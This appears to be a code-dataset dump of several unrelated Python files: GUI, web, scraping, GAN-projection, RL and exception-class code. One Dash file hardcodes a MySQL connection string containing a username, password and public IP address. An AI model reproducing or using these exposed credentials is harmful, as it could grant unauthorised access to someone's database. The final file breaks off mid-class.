text stringlengths 38 1.54M |
|---|
from sys import argv
def load_input(splitstring="\n"):
    """Read the puzzle input and return its non-empty chunks.

    Reads examples.txt when any CLI argument is present, input.txt
    otherwise, splits on *splitstring* and drops empty pieces.
    """
    use_examples = len(argv) > 1
    source = "examples.txt" if use_examples else "input.txt"
    print("Using test cases...\n" if use_examples else "Using input...\n")
    with open(source, "r") as handle:
        chunks = handle.read().split(splitstring)
    return [chunk for chunk in chunks if chunk]
def load_raw():
    """Return the raw text of the puzzle input file.

    Reads examples.txt when any CLI argument is present, input.txt otherwise.
    """
    if len(argv) > 1:
        source, banner = "examples.txt", "Using test cases...\n"
    else:
        source, banner = "input.txt", "Using input...\n"
    print(banner)
    with open(source, "r") as handle:
        return handle.read()
|
from werkzeug.exceptions import Conflict, NotFound, Unauthorized
class JSONException(Exception):
    """Custom JSON based exception.

    :param status_code: response status_code
    :param message: exception message
    """

    # Class-level defaults; subclasses override these.
    status_code = NotFound.code
    message = ''

    def __init__(self, message=None, status_code=None):
        super().__init__()
        if message is not None:
            self.message = message
        if status_code is not None:
            self.status_code = status_code

    def to_dict(self):
        """Serialize the exception into a JSON-ready response dict."""
        return {
            'code': self.status_code,
            'message': self.message,
            'error': {
                'type': str(self.__class__.__name__),
            },
        }
class ValidationFailed(JSONException):
    """Raised when request payload validation fails (HTTP 400)."""
    status_code = 400
    message = "Request validation failed"


class InvalidContentType(JSONException):
    """
    Raised when an invalid Content-Type is provided.
    """
    pass


class InvalidPermissions(JSONException):
    """Raised when the caller lacks permission (HTTP 401 Unauthorized)."""
    status_code = Unauthorized.code


class InvalidRequestException(JSONException):
    """Raised when required request data is missing.

    NOTE(review): 500 is a server-error code; 400 would normally fit a
    client-side "missing data" condition — confirm before changing.
    """
    status_code = 500
    message = "Invalid Request please submit all the required data"


class InvalidAPIRequest(JSONException):
    """
    Raised when an invalid request has been made.
    (e.g. accessed unexisting url, the schema validation did
    not pass)
    """
    pass


class DatabaseError(JSONException):
    """
    Generic database interaction error.
    Inherit this error for all subsequent
    errors that are related to database.
    """
    pass


class RecordNotFound(DatabaseError):
    """
    Raised when the record was not found in the database.
    """
    pass


class RecordAlreadyExists(DatabaseError):
    """
    Raised in the case of violation of a unique constraint.
    """
    status_code = Conflict.code


class NotAValidFileName(JSONException):
    """Raised for an unusable file name.

    NOTE(review): 500 suggests a server fault; if the name comes from the
    client, 400 may be more appropriate — confirm.
    """
    status_code = 500
    message = "Invalid file name"
|
from UI.MainWindow import Ui_MainWindow
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from UI.proc import proc
import cv2
import time
import os
# from interface.Detection import detector
class ui(QMainWindow, Ui_MainWindow):
    """Main window of a vehicle-flow counting tool.

    Workflow: open a video to grab a preview frame, draw counting lines on
    the preview with the mouse, queue videos and pick a detection model,
    then ``run`` feeds everything to ``proc`` and ``write_flow`` writes a
    per-line-pair flow report for each video.
    """

    def __init__(self):
        super(ui, self).__init__()
        self.setupUi(self)
        # Endpoints of the line currently being drawn, in label (widget)
        # coordinates; mapped to frame coordinates by set_pos().
        self.x1, self.x2 = 0, 0
        self.y1, self.y2 = 0, 0
        self.lines = []  # committed lines in frame coordinates: [x1, y1, x2, y2]
        self.files = []  # videos queued for processing
        self.font_font = cv2.FONT_HERSHEY_SCRIPT_SIMPLEX
        self.font_size = 4
        self.line_gap = 15  # px gap between a line and its number label
        self.is_drawing = False  # set by draw_line(), cleared on mouse release
        self.is_clicked = False  # mouse button held while drawing
        self.show_frame = None  # preview frame (BGR) of the opened video
        self.save_file = "."  # output directory for the flow reports
        self.video_capture = cv2.VideoCapture()
        self.model_path = "/home/szk/PycharmProjects/pytorch-retinanet/saved/resnet50_vehicle_39.pt"
        # self.files = ["/data/00_share/4天视频/01 227省道、东港路(4天)/4.9/227省道、东港路西北角_227省道、东港路西北角_20180409070000.mp4"]
        # self.lines.append([484, 385, 1606, 832])
        # self.lines.append([282, 490, 1139, 851])
        self.pushButton.clicked.connect(self.open_video)      # open preview video
        self.pushButton_2.clicked.connect(self.add_video)     # queue videos
        self.pushButton_3.clicked.connect(self.draw_line)     # start drawing a line
        self.pushButton_4.clicked.connect(self.save_config)   # choose output dir
        self.pushButton_5.clicked.connect(self.delete_line)   # remove last line
        self.pushButton_6.clicked.connect(self.run)           # process the queue
        self.pushButton_7.clicked.connect(self.choose_model)  # choose model file
        # self.show()

    def open_video(self):
        """Pick a video file, grab its first frame and show it in the label."""
        print("=> OPEN VIDEO!")
        filename, _ = QFileDialog.getOpenFileName(self,
                                                  "打开文件",
                                                  ".",
                                                  "mp4 Files(*.mp4);;ALL Files(*)")
        if filename == '':
            self.show_messages(['警告', '没有选择文件!'])
        else:
            print(filename)
            self.video_capture.open(filename)
            # NOTE(review): `ret` is never checked — an unreadable video
            # leaves `frame` as None and crashes on .shape below; confirm
            # inputs are always decodable.
            ret, frame = self.video_capture.read()
            self.show_frame = frame
            height, width = frame.shape[:2]
            if frame.ndim == 3:
                rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
            else:
                rgb = cv2.cvtColor(frame, cv2.COLOR_GRAY2BGR)
            # Builds QImage from flatten(); assumes contiguous rows (true
            # for cvtColor output).
            image = QImage(rgb.flatten(), width, height, QImage.Format_RGB888)
            image = image.scaled(self.label.width(), self.label.height(), Qt.KeepAspectRatio)
            self.label.setPixmap(QPixmap.fromImage(image))

    def add_video(self):
        """Append chosen video files (deduplicated) to the processing queue."""
        print("=> ADD VIDEO!")
        filenames, _ = QFileDialog.getOpenFileNames(self,
                                                    "打开文件",
                                                    ".",
                                                    "mp4 Files(*.mp4);;ALL Files(*)")
        self.textBrowser.setText("选择视频:")
        for fn in filenames:
            if fn not in self.files:
                self.files.append(fn)
        for file in self.files:
            print(file)
            self.textBrowser.append(file)

    def choose_model(self):
        """Pick the detector checkpoint to use for processing."""
        print("=> CHOOSE MODEL!")
        # NOTE(review): the filter uses a single ';' between the pth and pt
        # patterns — Qt expects ';;' between entries; presumably a typo.
        filename, _ = QFileDialog.getOpenFileName(self,
                                                  "打开文件",
                                                  ".",
                                                  "pth Files(*.pth);pt Files(*.pt);;ALL Files(*)")
        if filename == '':
            self.show_messages(['警告', '没有选择文件!'])
        else:
            print(filename)
            self.model_path = filename

    def save_config(self):
        """Choose the output directory (requires lines and videos first)."""
        if len(self.lines) == 0:
            self.show_messages(['Warning', "Please draw lines first!"])
            return
        elif len(self.files) == 0:
            self.show_messages(['Warning', "Please add videos first!"])
            return
        filename = QFileDialog.getExistingDirectory(self,
                                                    "Save",
                                                    "/data/yxy/")
        if filename == "":
            print("...")
        else:
            self.save_file = filename

    def draw_line(self):
        """Arm line-drawing mode; the next mouse drag defines a new line."""
        # NOTE(review): video_capture is constructed in __init__, so this
        # None check can never trigger; isOpened() is probably what was
        # intended — confirm.
        if self.video_capture is None:
            self.show_messages(['警告!', "请先添加视频!"])
        self.is_drawing = True
        print("=> start draw line")

    def delete_line(self):
        """Remove the last committed line and redraw the preview."""
        if len(self.lines) > 0:
            self.lines.pop()
        else:
            self.show_messages(['警告!', '没有线条可以删除!'])
        temp = self.show_frame.copy()
        height, width = temp.shape[:2]
        # Re-render the remaining numbered lines onto a copy of the frame.
        for i in range(len(self.lines)):
            x1, y1, x2, y2 = self.lines[i]
            cv2.line(temp, (x1, y1), (x2, y2), (0, 0, 255), 5)
            cv2.putText(temp, str(i + 1), (x1, y1 - self.line_gap),
                        self.font_font, self.font_size, (0, 0, 255), 2)
        if temp.ndim == 3:
            rgb = cv2.cvtColor(temp, cv2.COLOR_BGR2RGB)
        else:
            rgb = cv2.cvtColor(temp, cv2.COLOR_GRAY2BGR)
        image = QImage(rgb.flatten(), width, height, QImage.Format_RGB888)
        image = image.scaled(self.label.width(), self.label.height(), Qt.KeepAspectRatio)
        self.label.setPixmap(QPixmap.fromImage(image))

    def set_pos(self, height, width):
        """Map the current drag endpoints from label to frame coordinates."""
        x1 = int(self.x1 / self.label.width() * width)
        y1 = int(self.y1 / self.label.height() * height)
        x2 = int(self.x2 / self.label.width() * width)
        y2 = int(self.y2 / self.label.height() * height)
        return x1, y1, x2, y2

    def paintEvent(self, event):
        """Live-preview the line being dragged, plus all committed lines."""
        # NOTE(review): assigning event.parent has no visible effect on the
        # Qt paint event — looks vestigial; confirm before removing.
        event.parent = self.label
        if self.is_drawing and self.is_clicked:
            temp = self.show_frame.copy()
            height, width = temp.shape[:2]
            temp = cv2.resize(temp, (width, height))
            # draw old lines (red)
            for i in range(len(self.lines)):
                x1, y1, x2, y2 = self.lines[i]
                cv2.line(temp, (x1, y1), (x2, y2), (0, 0, 255), 5)
                cv2.putText(temp, str(i + 1), (x1, y1 - self.line_gap),
                            self.font_font, self.font_size, (0, 0, 255), 2)
            # draw new line (blue, not yet committed)
            x1, y1, x2, y2 = self.set_pos(height, width)
            cv2.line(temp, (x1, y1), (x2, y2), (255, 0, 0), 5)
            cv2.putText(temp, str(len(self.lines) + 1), (x1, y1 - self.line_gap),
                        self.font_font, self.font_size, (255, 0, 0), 2)
            if temp.ndim == 3:
                rgb = cv2.cvtColor(temp, cv2.COLOR_BGR2RGB)
            else:
                rgb = cv2.cvtColor(temp, cv2.COLOR_GRAY2BGR)
            image = QImage(rgb.flatten(), width, height, QImage.Format_RGB888)
            image = image.scaled(self.label.width(), self.label.height(), Qt.KeepAspectRatio)
            self.label.setPixmap(QPixmap.fromImage(image))

    def mousePressEvent(self, event):
        """Record the drag start point while in drawing mode."""
        if self.is_drawing:
            self.is_clicked = True
            self.x1 = event.pos().x()
            self.y1 = event.pos().y()

    def mouseMoveEvent(self, event):
        """Track the drag end point and request a repaint."""
        if self.is_drawing:
            self.x2 = event.pos().x()
            self.y2 = event.pos().y()
            self.update()

    def mouseReleaseEvent(self, event):
        """Commit the dragged line (frame coordinates) and redraw."""
        if self.is_drawing:
            self.is_drawing = False
            self.is_clicked = False
            temp = self.show_frame.copy()
            height, width = temp.shape[:2]
            for i in range(len(self.lines)):
                x1, y1, x2, y2 = self.lines[i]
                cv2.line(temp, (x1, y1), (x2, y2), (0, 0, 255), 5)
                cv2.putText(temp, str(i + 1), (x1, y1 - self.line_gap),
                            self.font_font, self.font_size, (0, 0, 255), 2)
            x1, y1, x2, y2 = self.set_pos(height, width)
            cv2.line(temp, (x1, y1), (x2, y2), (0, 0, 255), 5)
            cv2.putText(temp, str(len(self.lines) + 1), (x1, y1 - self.line_gap),
                        self.font_font, self.font_size, (0, 0, 255), 2)
            if temp.ndim == 3:
                rgb = cv2.cvtColor(temp, cv2.COLOR_BGR2RGB)
            else:
                rgb = cv2.cvtColor(temp, cv2.COLOR_GRAY2BGR)
            image = QImage(rgb.flatten(), width, height, QImage.Format_RGB888)
            image = image.scaled(self.label.width(), self.label.height(), Qt.KeepAspectRatio)
            self.label.setPixmap(QPixmap.fromImage(image))
            print("lines", [x1, y1, x2, y2])
            self.lines.append([x1, y1, x2, y2])

    def show_messages(self, msg):
        """Pop an information box; msg is a [title, body] pair."""
        QMessageBox.information(self, msg[0], msg[1], QMessageBox.Yes)

    def write_flow(self, video, result):
        """Write the per-line-pair vehicle counts for *video* to a .txt file.

        `result` is indexed as [category, from_line, to_line]; the header
        columns are vehicle categories (sedan, bus, truck sizes, trailer).
        """
        file = os.path.join(self.save_file,
                            video.split("/")[-1].split(".")[0] + ".txt")
        # NOTE(review): the file handle is never closed — a `with` block
        # would be safer; left unchanged here.
        fp = open(file, "w")
        print(result.shape)
        fp.write("\t轿车\t公交车\t小型货车\t中型货车\t大型货车\t拖挂车\n")
        for i in range(result.shape[1]):
            for j in range(result.shape[2]):
                if i == j:
                    continue  # no flow from a line to itself
                fp.write(str(i + 1) + "-" + str(j + 1) + "\t")
                for category in range(result.shape[0]):
                    fp.write(str(result[category, i, j]) + "\t")
                fp.write("\n")
        return

    def run(self):
        """Process every queued video through `proc` and save its report."""
        self.textBrowser.append("开始处理视频:")
        # load tf model
        for video in self.files:
            self.textBrowser.append(video + "处理中...")
            t1 = time.time()
            print(self.checkshow.isChecked())
            result = proc(label=self.label,
                          video=video,
                          lines=self.lines,
                          model_path=self.model_path,
                          gap=self.spinBox.value(),
                          if_show=self.checkshow.isChecked())
            t2 = time.time()
            self.write_flow(video, result)
            self.textBrowser.append("{:d} minutes".format(int((t2 - t1) / 60)))
        self.textBrowser.append("处理完成...")
|
import pandas as pd
import dash
import dash_core_components as dcc
import dash_html_components as html
from sqlalchemy import create_engine
from dash.dependencies import Input, Output, State
import dash_table_experiments as dt
engine = create_engine("mysql+pymysql://eums:eums00!q@133.186.146.142:3306/eums-poi?charset=utf8mb4", encoding = 'utf8' ,
pool_size=20,pool_recycle=3600,connect_args={'connect_timeout':1000000} )
app = dash.Dash()
query = '''
select *
from TEMP0002
where state = "-1" '''
df = pd.read_sql_query(query, engine)
id_list = [id for id in df['ID']]
app.layout = html.Div([
html.Button(id='submit-button', n_clicks=0, children='업데이트', style={'fontSize': 15, 'height': 30}),
html.Div([dt.DataTable(rows=[{}], id='inner_table')], id='table', className="container",
style={'width': "100%", 'display': 'inline-block'})
])
@app.callback(
    Output('table', 'children'),
    [Input('submit-button', 'n_clicks')])
def get_table(n_clicks):
    """Rebuild the DataTable whenever the update button is clicked.

    NOTE(review): `df` is loaded once at startup, so clicking only
    re-renders the same data; re-running the SQL query here would make the
    button a true refresh — confirm intent.
    """
    return dt.DataTable(
        rows=df.to_dict('records'),
        columns=df.columns,
        row_selectable=True,
        filterable=True,
        sortable=True,
        # Key columns are locked against editing.
        editable={'ADDR': False, 'ID': False, 'CO_NAME': False, 'LATITUDE': False, 'LONGITUDE': False, 'REP_PHONE_NUM': False, 'STATE': False},
        selected_row_indices=[],
        resizable=True,
        max_rows_in_viewport=10,
        min_width=2000,
        id='inner_table'
    )


if __name__ == '__main__':
    app.run_server(debug=True)
import sys
def validate_empty_fields(data, field):
    """Abort the process (exit code 1) when *data* is empty or falsy.

    *field* is only used in the error message to name the offending field.
    """
    if data:
        return
    print(f"ERROR: '{data}' is not a valid {field}!")
    sys.exit(1)


validate_empty_fields('{{ cookiecutter.project_short_description }}', "project_short_description")
|
import requests
from bs4 import BeautifulSoup

# Scrape the HEIGHT paragraph from an NBA player profile page.
url = "https://www.nba.com/players/jalen/adams/1629824"
html = requests.get(url)
soup = BeautifulSoup(html.text,'lxml')
# NOTE(review): this matches only <p> tags whose string is *exactly* this
# whitespace-sensitive text — brittle against any markup change; also
# "hight" is a typo for "height".
hight = soup.find_all('p', string='\n HEIGHT\n ')
print(hight)
# url = 'HEIGHT
# '
import os
import json
from renjuu.game.const import Color
class Scoreboard:
    """Persist per-color win statistics as a JSON file plus a text report."""

    def __init__(self, filename):
        # Base path; ".json" / ".txt" suffixes are appended on use.
        self.filename = filename

    @staticmethod
    def parse_data(data):
        """Render the score dict as a human-readable table string."""
        rendered = ["Score table\n"]
        for key in data:
            rendered.append("%s : %s \n" % (key, data[key]))
        return "".join(rendered)

    @staticmethod
    def stat_increment(data: dict, win_color: Color, players: list):
        """Award 2 points to the winner, or 1 to every player on a draw."""
        if win_color == Color.non:
            for player in players:
                data[player.color.name] += 1
        else:
            data[win_color.name] += 2

    @staticmethod
    def json_save(filename, data):
        """Serialize *data* to *filename* as JSON."""
        with open(filename, 'w+') as file:
            json.dump(data, file)

    def json_load(self, filename):
        """Load the score dict, creating a zeroed file first if missing."""
        self.check_path_exist(filename)
        with open(filename, 'r') as file:
            return json.load(file)

    def check_path_exist(self, filename):
        """Seed *filename* with zero scores for every playable color."""
        if not os.path.exists(filename):
            fresh = {color.name: 0 for color in Color if color is not Color.non}
            self.json_save(filename, fresh)

    @staticmethod
    def save(filename, text):
        """Write the plain-text report to *filename*."""
        with open(filename, 'w+') as file:
            file.write(text)

    def update_stat(self, game):
        """Fold *game*'s outcome into the stored stats and text report."""
        json_name = self.filename + ".json"
        data = self.json_load(json_name)
        self.stat_increment(data, game.winner, game.players)
        self.json_save(json_name, data)
        self.save(self.filename + ".txt", self.parse_data(data))
|
import argparse
import math
import os
import numpy as np
import torch
from PIL import Image
from torch import optim
from torch.nn import functional as F
from torch.utils import data
from torchvision import transforms
from tqdm import tqdm
from model import Generator
from train import data_sampler, sample_data
from utils import lpips
from utils.dataset import MultiResolutionDataset
def noise_regularize_(noises):
    """Penalize spatial autocorrelation of each noise map across scales.

    For every (N, 1, H, W) noise tensor, adds the squared mean correlation
    with its one-pixel circular shifts along both spatial axes, then
    2x2-average-pools and repeats until the map is 8x8 or smaller.
    Returns the accumulated scalar loss.
    """
    loss = 0
    for noise in noises:
        current = noise
        size = current.shape[2]
        while True:
            shift_w = (current * torch.roll(current, shifts=1, dims=3)).mean().pow(2)
            shift_h = (current * torch.roll(current, shifts=1, dims=2)).mean().pow(2)
            loss = loss + shift_w + shift_h
            if size <= 8:
                break
            current = current.reshape([-1, 1, size // 2, 2, size // 2, 2]).mean([3, 5])
            size //= 2
    return loss
def noise_normalize_(noises):
    """Standardize each noise tensor in place to zero mean, unit std."""
    for noise in noises:
        mu = noise.mean()
        sigma = noise.std()
        noise.data.sub_(mu)
        noise.data.div_(sigma)
def get_lr(t, initial_lr, rampdown=0.25, rampup=0.05):
    """Cosine learning-rate schedule with linear warm-up.

    *t* is normalized progress in [0, 1]; the LR ramps up linearly over the
    first *rampup* fraction and cosine-decays over the final *rampdown*.
    """
    ramp = min(1, (1 - t) / rampdown)
    ramp = 0.5 - 0.5 * math.cos(ramp * math.pi)
    return initial_lr * (ramp * min(1, t / rampup))
def latent_noise(latent, strength):
    """Return *latent* plus Gaussian noise scaled per-row by *strength*."""
    perturbation = torch.unsqueeze(strength, -1) * torch.randn_like(latent)
    return latent + perturbation
def make_image(tensor):
    """Convert a [-1, 1] NCHW image batch to uint8 NHWC numpy arrays.

    Note: clamping happens in place on the detached view, so the caller's
    tensor data is clamped too (same behavior as the original chain).
    """
    pixels = tensor.detach().clamp_(min=-1, max=1)
    pixels = pixels.add(1).div_(2).mul(255)
    pixels = pixels.type(torch.uint8).permute(0, 2, 3, 1)
    return pixels.to('cpu').numpy()
if __name__ == '__main__':
    # Projects real images into the latent space of a trained StyleGAN-like
    # generator by jointly optimizing latents and per-layer noise maps
    # against LPIPS + noise-regularization + optional MSE.
    device = 'cuda'
    parser = argparse.ArgumentParser()
    parser.add_argument('--ckpt', type=str, required=True)
    parser.add_argument('--dataset', type=str, required=True)
    parser.add_argument('--size', type=int, default=256)
    parser.add_argument('--lr_rampup', type=float, default=0.05)
    parser.add_argument('--lr_rampdown', type=float, default=0.25)
    parser.add_argument('--lr', type=float, default=0.1)
    parser.add_argument('--noise', type=float, default=0.05)
    parser.add_argument('--noise_ramp', type=float, default=0.75)
    parser.add_argument('--step', type=int, default=1000)
    parser.add_argument('--noise_regularize', type=float, default=1e5)
    parser.add_argument('--mse', type=float, default=0)
    parser.add_argument('--batch', type=int, default=8)
    parser.add_argument('--output_dir', type=str, default='./projection')
    args = parser.parse_args()
    # Architecture constants matching the trained checkpoint.
    n_mean_latent = 10000  # samples used to estimate the latent mean/std
    args.latent = 512
    args.token = 2 * (int(math.log(args.size, 2)) - 1)  # style layers count
    args.n_mlp = 8
    args.w_space = False
    # LPIPS operates at <=256px, so targets are downsized accordingly.
    resize = min(args.size, 256)
    transform = transforms.Compose(
        [
            transforms.Resize(resize),
            transforms.CenterCrop(resize),
            transforms.ToTensor(),
            transforms.Normalize([0.5, 0.5, 0.5], [0.5, 0.5, 0.5]),
        ]
    )
    dataset = MultiResolutionDataset(args.dataset, transform, args.size)
    loader = data.DataLoader(
        dataset,
        batch_size=args.batch,
        sampler=data_sampler(dataset, shuffle=True, distributed=False),
        drop_last=True,
    )
    loader = sample_data(loader)
    # One fixed batch of target images to invert.
    imgs = next(loader).to(device)
    g_ema = Generator(args.size, args.latent, args.token, args.n_mlp, w_space=args.w_space)
    g_ema.load_state_dict(torch.load(args.ckpt)['g_ema'])
    g_ema.eval()
    g_ema = g_ema.to(device)
    # Estimate the mean latent and its per-layer std from random samples;
    # these seed and scale the optimization.
    with torch.no_grad():
        noise_sample = torch.randn(n_mean_latent, args.token, args.latent, device=device)
        noise_sample = torch.cat([noise_sample, g_ema.token.repeat(noise_sample.size()[0], 1, 1)], 2)
        latent_out = g_ema.style(noise_sample)
        latent_mean = latent_out.mean(0)
        latent_std = ((latent_out - latent_mean).pow(2).sum([0, 2]) / n_mean_latent) ** 0.5
    percept = lpips.PerceptualLoss(
        model='net-lin', net='vgg', use_gpu=device.startswith('cuda')
    )
    # Optimizable per-layer noise maps, one copy per batch element.
    noise_single = g_ema.make_noise()
    noises = []
    for noise in noise_single:
        noises.append(noise.repeat(args.batch, 1, 1, 1).normal_())
    latent_in = latent_mean.detach().clone().unsqueeze(0).repeat(args.batch, 1, 1)
    latent_in.requires_grad = True
    for noise in noises:
        noise.requires_grad = True
    optimizer = optim.Adam([latent_in] + noises, lr=args.lr)
    pbar = tqdm(range(args.step))
    latent_path = []         # latent snapshots every 100 steps
    perceptual_values = []   # loss curves sampled every 10 steps
    noise_values = []
    mse_values = []
    for i in pbar:
        t = i / args.step
        lr = get_lr(t, args.lr, rampdown=args.lr_rampdown, rampup=args.lr_rampup)
        optimizer.param_groups[0]['lr'] = lr
        # Inject decaying exploration noise into the latents.
        noise_strength = latent_std * args.noise * max(0, 1 - t / args.noise_ramp) ** 2
        latent_n = latent_noise(latent_in, noise_strength)
        img_gen, _ = g_ema(latent_n, input_is_latent=True, noise=noises)
        batch, channel, height, width = img_gen.shape
        # Average-pool generated images down to <=256px to match LPIPS input.
        if height > 256:
            factor = height // 256
            img_gen = img_gen.reshape(
                batch, channel, height // factor, factor, width // factor, factor
            )
            img_gen = img_gen.mean([3, 5])
        p_loss = percept(img_gen, imgs).sum()
        n_loss = noise_regularize_(noises)
        mse_loss = F.mse_loss(img_gen, imgs)
        loss = p_loss + args.noise_regularize * n_loss + args.mse * mse_loss
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()
        # Keep noise maps standardized so the regularizer stays meaningful.
        noise_normalize_(noises)
        if (i + 1) % 100 == 0:
            latent_path.append(latent_in.detach().clone())
        if (i + 1) % 10 == 0:
            perceptual_values.append(p_loss.item())
            noise_values.append(n_loss.item())
            mse_values.append(mse_loss.item())
        pbar.set_description(
            (
                f'perceptual: {p_loss.item():.4f}; noise regularize: {n_loss.item():.4f};'
                f' mse: {mse_loss.item():.4f}; lr: {lr:.4f}'
            )
        )
    # Final render from the last snapshot; save curves and image pairs.
    # NOTE(review): requires args.step >= 100, otherwise latent_path is
    # empty and latent_path[-1] raises IndexError — confirm expected usage.
    img_gen, _ = g_ema(latent_path[-1], input_is_latent=True, noise=noises)
    img_or = make_image(imgs)
    img_ar = make_image(img_gen)
    os.makedirs(args.output_dir, exist_ok=True)
    np.save(os.path.join(args.output_dir, f'latents.npy'), latent_path[-1].cpu().numpy())
    np.save(os.path.join(args.output_dir, f'perceptual.npy'), perceptual_values)
    np.save(os.path.join(args.output_dir, f'noise.npy'), noise_values)
    np.save(os.path.join(args.output_dir, f'mse.npy'), mse_values)
    for i in range(args.batch):
        img1 = Image.fromarray(img_or[i])
        img1.save(os.path.join(args.output_dir, f'origin_{i}.png'))
        img2 = Image.fromarray(img_ar[i])
        img2.save(os.path.join(args.output_dir, f'project_{i}.png'))
|
##
# base exceptions
##

# base exception
# NOTE(review): this class shadows the builtin `BaseException` — a rename
# (e.g. AppBaseException) would avoid confusion, but callers import this
# name, so it is left as-is.
# NOTE(review): every __init__ below passes the tuple `args` and the dict
# `kwargs` as two positional arguments instead of unpacking them
# (`*args, **kwargs`); the pattern is consistent throughout, so it is
# documented rather than changed — confirm intent before fixing.
class BaseException(Exception):
    def __init__(self, *args, **kwargs):
        super(BaseException, self).__init__(args, kwargs)


# db base exception
class DbBaseException(BaseException):
    def __init__(self, *args, **kwargs):
        super(DbBaseException, self).__init__(args, kwargs)


# db email base exception
class DbEmailBaseException(DbBaseException):
    def __init__(self, *args, **kwargs):
        super(DbEmailBaseException, self).__init__(args, kwargs)


# model base exception
class ModelBaseException(BaseException):
    def __init__(self, *args, **kwargs):
        super(ModelBaseException, self).__init__(args, kwargs)


# model email base exception
class ModelEmailBaseException(ModelBaseException):
    def __init__(self, *args, **kwargs):
        super(ModelEmailBaseException, self).__init__(args, kwargs)


# model indexer base exception
class ModelIndexerBaseException(ModelBaseException):
    def __init__(self, *args, **kwargs):
        super(ModelIndexerBaseException, self).__init__(args, kwargs)


# model indexer_to_email base exception
class ModelIndexerToEmailBaseException(ModelBaseException):
    def __init__(self, *args, **kwargs):
        super(ModelIndexerToEmailBaseException, self).__init__(args, kwargs)


# loader base exception
class LoaderBaseException(BaseException):
    def __init__(self, *args, **kwargs):
        super(LoaderBaseException, self).__init__(args, kwargs)


# loader email base exception
class LoaderEmailBaseException(LoaderBaseException):
    def __init__(self, *args, **kwargs):
        super(LoaderEmailBaseException, self).__init__(args, kwargs)


# helper base exception
class HelperBaseException(BaseException):
    def __init__(self, *args, **kwargs):
        super(HelperBaseException, self).__init__(args, kwargs)
##
# exceptions
##

# db email exceptions
class DbEmailDirNotExistsException(DbEmailBaseException):
    """Raised when the email database directory does not exist."""
    def __init__(self, *args, **kwargs):
        super(DbEmailDirNotExistsException, self).__init__(args, kwargs)


class DbEmailLabelFileNotExistsException(DbEmailBaseException):
    """Raised when the email label file is missing."""
    def __init__(self, *args, **kwargs):
        super(DbEmailLabelFileNotExistsException, self).__init__(args, kwargs)


class DbEmailCreatingTableErrorException(DbEmailBaseException):
    """Raised when creating the email table fails."""
    def __init__(self, *args, **kwargs):
        super(DbEmailCreatingTableErrorException, self).__init__(args, kwargs)


class DbEmailInsertingTableErrorException(DbEmailBaseException):
    """Raised when inserting into the email table fails."""
    def __init__(self, *args, **kwargs):
        super(DbEmailInsertingTableErrorException, self).__init__(args, kwargs)


# model email exceptions
class ModelEmailLabelInvalidException(ModelEmailBaseException):
    """Raised when an email carries an invalid label."""
    def __init__(self, *args, **kwargs):
        super(ModelEmailLabelInvalidException, self).__init__(args, kwargs)


class ModelEmailFileNotExistsException(ModelEmailBaseException):
    """Raised when an email file is missing on disk."""
    def __init__(self, *args, **kwargs):
        super(ModelEmailFileNotExistsException, self).__init__(args, kwargs)


class ModelEmailEncodingIncorrectException(ModelEmailBaseException):
    """Raised when an email file cannot be decoded."""
    def __init__(self, *args, **kwargs):
        super(ModelEmailEncodingIncorrectException, self).__init__(args, kwargs)


class ModelEmailParsingErrorException(ModelEmailBaseException):
    """Raised when an email file cannot be parsed."""
    def __init__(self, *args, **kwargs):
        super(ModelEmailParsingErrorException, self).__init__(args, kwargs)
# loader email exceptions
class LoaderEmailDataDirNotExistsException(LoaderEmailBaseException):
    """Raised when the loader's email data directory does not exist."""
    def __init__(self, *args, **kwargs):
        # Bug fix: the super() call previously named the misspelled class
        # `LoaderEmailDataDirNotExistsExceptionn` (trailing 'n'), raising
        # NameError whenever this exception was instantiated.
        super(LoaderEmailDataDirNotExistsException, self).__init__(args, kwargs)
class LoaderEmailLabelsInvalidException(LoaderEmailBaseException):
    """Raised when the loader's label data is invalid."""
    def __init__(self, *args, **kwargs):
        super(LoaderEmailLabelsInvalidException, self).__init__(args, kwargs)


class LoaderEmailDbConnectionInvalidException(LoaderEmailBaseException):
    """Raised when the loader's database connection is invalid."""
    def __init__(self, *args, **kwargs):
        super(LoaderEmailDbConnectionInvalidException, self).__init__(args, kwargs)


# helper exceptions
class HelperEmailLabelFileNotExistsException(HelperBaseException):
    """Raised when the helper cannot find the email label file."""
    def __init__(self, *args, **kwargs):
        super(HelperEmailLabelFileNotExistsException, self).__init__(args, kwargs)
import torch.nn as nn
from torch.distributions import Normal
import torch
import numpy as np
class MLPPolicy(nn.Module):
    """Gaussian policy head: one hidden layer, tanh-bounded mean in
    [-1, 1], strictly positive Softplus std."""

    def __init__(self, state_dim, action_dim):
        super(MLPPolicy, self).__init__()
        self.fc1 = nn.Linear(state_dim, 100)
        self.relu1 = nn.ReLU()
        self.fc_mean = nn.Linear(100, action_dim)
        self.tanh = nn.Tanh()
        self.fc_std = nn.Linear(100, action_dim)
        self.sigmoid = nn.Softplus()  # name kept for checkpoint compat; it is a Softplus
        nn.init.kaiming_normal_(self.fc1.weight.data)
        nn.init.xavier_normal_(self.fc_mean.weight.data)
        nn.init.xavier_normal_(self.fc_std.weight.data)

    def forward(self, x):
        """Return (mean, std) of the action distribution for states *x*."""
        hidden = self.relu1(self.fc1(x))
        mean = self.tanh(self.fc_mean(hidden))
        std = self.sigmoid(self.fc_std(hidden)) + 1e-5  # keep std > 0
        return mean, std

    def choose_action(self, state):
        """Sample an action from N(mean, std) as a numpy array."""
        mean, std = self.forward(state)
        return Normal(mean, std).sample().numpy()
class MLPValue(nn.Module):
    """State-value head: Linear(state, 100) -> ReLU -> Linear(100, 1)."""

    def __init__(self, state_dim):
        super(MLPValue, self).__init__()
        self.fc1 = nn.Linear(state_dim, 100)
        self.relu = nn.ReLU()
        self.fc2 = nn.Linear(100, 1)
        self.tanh = nn.Tanh()  # constructed but unused in forward; kept for state_dict compat
        nn.init.kaiming_normal_(self.fc1.weight.data)
        nn.init.xavier_normal_(self.fc2.weight.data)

    def forward(self, x):
        """Return the scalar value estimate per state row."""
        return self.fc2(self.relu(self.fc1(x)))
class MLPRotation(nn.Module):
    """Gaussian rotation policy head (same architecture as MLPPolicy)."""

    def __init__(self, state_dim, action_dim):
        super(MLPRotation, self).__init__()
        self.fc1 = nn.Linear(state_dim, 100)
        self.relu1 = nn.ReLU()
        self.fc_mean = nn.Linear(100, action_dim)
        self.tanh = nn.Tanh()
        self.fc_std = nn.Linear(100, action_dim)
